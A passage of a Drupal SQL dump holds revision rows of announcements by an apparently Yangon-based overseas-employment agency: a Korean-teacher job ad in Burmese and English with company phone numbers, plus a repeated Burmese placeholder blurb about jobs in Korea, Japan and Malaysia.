('announcement', 0, 4, 40, 'en', 0, '<p><strong>အမြန်အလိုရှိပါတယ်</strong></p><p>အောက်ပါ အချက်အလက်များနှင့် ကိုက်ညီသော ကိုရီယားဘာသာ သင်ကြားနိူင်သော ဆရာ/ဆရာမ (၁)ဦး Yangonတွင် ခန့်ထားရန်အလိုရှိပါတယ်</p><ul><li>ဘုရင်နောင်လမ်ကြီးပေါ်ရှိ ရေကြောင်းသိပ္ပံ ဒီဂရီကောလိပ်ကျောင်း (ဝါ) ဆင်မလိုက်သင်္ဘောကျင်းနှင့် နီးသောသူများနှင့် ၄င်းနေရာသို့ လာရောက် သင်ကြားနိူင်သောသူ ဖြစ်ရမယ်</li><li>ကိုရီယားဘာသာစကား Level(3) အနည်းဆုံး အောင်ထားရမယ်</li><li>ကိုရီယားဘာသာစကား သင်ကြားမူ အတွေ့အကြုံ အနည်းဆုံး (၁)နှစ် အနည်းဆုံးရှိမယ်</li><li>တစ်နေ့ သင်တန်းချိန် မနံက်ပိုင်းတစ်ချိန်နှင့် နေ့လည်ပိုင်းတစ်ချိန် အနည်းဆုံး သင်ကြားနိူင်ရမည်</li></ul><h3><br>ဆက်သွယ်ရန်<br>&nbsp;</h3><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 49, 'en', 0, '<h3><strong>အမြန်အလိုရှိပါတယ်</strong></h3><p>အောက်ပါ အချက်အလက်များနှင့် ကိုက်ညီသော ကိုရီယားဘာသာ သင်ကြားနိူင်သော ဆရာ/ဆရာမ (၁)ဦး Yangonတွင် ခန့်ထားရန်အလိုရှိပါတယ်</p><ul><li>ဘုရင်နောင်လမ်ကြီးပေါ်ရှိ ရေကြောင်းသိပ္ပံ ဒီဂရီကောလိပ်ကျောင်း (ဝါ) ဆင်မလိုက်သင်္ဘောကျင်းနှင့် နီးသောသူများနှင့် ၄င်းနေရာသို့ လာရောက် သင်ကြားနိူင်သောသူ ဖြစ်ရမယ်</li><li>ကိုရီယားဘာသာစကား Level(3) အနည်းဆုံး အောင်ထားရမယ်</li><li>ကိုရီယားဘာသာစကား သင်ကြားမူ အတွေ့အကြုံ အနည်းဆုံး (၁)နှစ် အနည်းဆုံးရှိမယ်</li><li>တစ်နေ့ သင်တန်းချိန် မနံက်ပိုင်းတစ်ချိန်နှင့် နေ့လည်ပိုင်းတစ်ချိန် အနည်းဆုံး သင်ကြားနိူင်ရမည်</li></ul><h3><br>ဆက်သွယ်ရန်<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 75, 'en', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 131, 'en', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 131, 'ja', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 134, 'en', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 134, 'ja', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 134, 'ko', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 204, 'en', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 204, 'ja', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 204, 'ko', 0, '<h3>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 208, 'en', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 208, 'ja', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 208, 'ko', 0, '<h3>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 209, 'en', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 209, 'ja', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 209, 'ko', 0, '<h3>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 210, 'en', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 210, 'ja', 0, '<h3>Wanted Desperately</h3><p>Korean Language Teacher (Female/Male) 1 position who meets the following qualifications is needed in Yangon.</p><ul><li>Those who live near Sinmalike Shipyard situated on Bayint Naung Road or who can come and teach in that place.</li><li>Must have at least TOPIK Level 3 Certificate</li><li>Must have at least 1 year teaching experience as Korean Language Teacher</li><li>Can teach at least 2 sections per day; in the morning and afternoon.</li></ul><h3><br>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 210, 'ko', 0, '<h3>Contact Us<br>&nbsp;</h3><p>- NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('announcement', 0, 5, 10, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 22, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 25, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 26, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် 